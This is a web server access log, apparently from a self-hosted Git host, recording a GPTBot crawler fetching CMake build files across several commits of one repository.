"/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make?display=source" [Client 74.7.227.38] [Length 11232] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" +[17/Feb/2026:18:03:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake?display=source" [Client 74.7.227.38] [Length 13732] [Gzip 4.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" +[17/Feb/2026:18:03:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake?display=source" [Client 74.7.227.38] [Length 13729] [Gzip 4.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" +[17/Feb/2026:18:03:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake?display=rendered" [Client 74.7.227.38] [Length 11092] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" +[17/Feb/2026:18:03:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make?display=source" [Client 74.7.227.38] [Length 11504] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" +[17/Feb/2026:18:03:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake?display=source" [Client 74.7.227.38] [Length 13730] [Gzip 4.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" +[17/Feb/2026:18:03:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks?display=source" [Client 74.7.227.38] [Length 11184] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" +[17/Feb/2026:18:03:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake?display=source" [Client 74.7.227.38] [Length 15123] [Gzip 5.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:18:03:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake?display=source" [Client 74.7.227.38] [Length 15099] [Gzip 5.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:18:03:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks?display=source" [Client 74.7.227.38] [Length 11187] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" +[17/Feb/2026:18:03:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake?display=rendered" [Client 74.7.227.38] [Length 11093] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:18:03:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt?display=source" [Client 74.7.227.38] [Length 11201] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" +[17/Feb/2026:18:03:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make?display=source" [Client 74.7.227.38] [Length 11506] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" +[17/Feb/2026:18:03:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake?display=rendered" [Client 74.7.227.38] [Length 11095] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:18:03:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make?display=rendered" [Client 74.7.227.38] [Length 11083] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" +[17/Feb/2026:18:03:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin?display=rendered" [Client 74.7.227.38] [Length 11052] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" +[17/Feb/2026:18:03:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks?display=rendered" [Client 74.7.227.38] [Length 11124] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" +[17/Feb/2026:18:03:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake?display=rendered" [Client 74.7.227.38] [Length 11096] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:18:03:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake?display=rendered" [Client 74.7.227.38] [Length 11091] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" +[17/Feb/2026:18:03:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make?display=source" [Client 74.7.227.38] [Length 11233] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" +[17/Feb/2026:18:03:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin?display=rendered" [Client 74.7.227.38] [Length 11053] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" +[17/Feb/2026:18:03:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make?display=source" [Client 74.7.227.38] [Length 11234] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" +[17/Feb/2026:18:03:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake?display=rendered" [Client 74.7.227.38] [Length 11063] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" +[17/Feb/2026:18:03:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake?display=source" [Client 74.7.227.38] [Length 15123] [Gzip 5.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:18:03:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make?display=rendered" [Client 74.7.227.38] [Length 11089] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" +[17/Feb/2026:18:03:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake?display=source" [Client 74.7.227.38] [Length 15123] [Gzip 5.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:18:03:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make?display=rendered" [Client 74.7.227.38] [Length 11083] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" +[17/Feb/2026:18:03:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin?display=rendered" [Client 74.7.227.38] [Length 11030] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" +[17/Feb/2026:18:03:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make?display=source" [Client 74.7.227.38] [Length 15274] [Gzip 4.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" +[17/Feb/2026:18:03:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake?display=source" [Client 74.7.227.38] [Length 13730] [Gzip 4.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" +[17/Feb/2026:18:04:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake?display=rendered" [Client 74.7.227.38] [Length 11095] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:18:04:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make?display=source" [Client 74.7.227.38] [Length 11231] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" +[17/Feb/2026:18:04:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make?display=source" [Client 74.7.227.38] [Length 11233] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" +[17/Feb/2026:18:04:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake?display=rendered" [Client 74.7.227.38] [Length 11097] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:18:04:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make?display=source" [Client 74.7.227.38] [Length 11507] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" +[17/Feb/2026:18:04:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake?display=rendered" [Client 74.7.227.38] [Length 11069] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:18:04:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake?display=source" [Client 74.7.227.38] [Length 13729] [Gzip 4.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" +[17/Feb/2026:18:04:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt?display=source" [Client 74.7.227.38] [Length 11199] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" +[17/Feb/2026:18:04:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake?display=rendered" [Client 74.7.227.38] [Length 11092] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" +[17/Feb/2026:18:04:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make?display=rendered" [Client 74.7.227.38] [Length 11084] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" +[17/Feb/2026:18:04:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake?display=source" [Client 74.7.227.38] [Length 15125] [Gzip 5.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:18:04:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make?display=source" [Client 74.7.227.38] [Length 15275] [Gzip 4.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" +[17/Feb/2026:18:04:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake?display=source" [Client 74.7.227.38] [Length 15125] [Gzip 5.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:18:04:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake?display=rendered" [Client 74.7.227.38] [Length 11090] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" +[17/Feb/2026:18:04:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make?display=rendered" [Client 74.7.227.38] [Length 11084] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" +[17/Feb/2026:18:04:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr 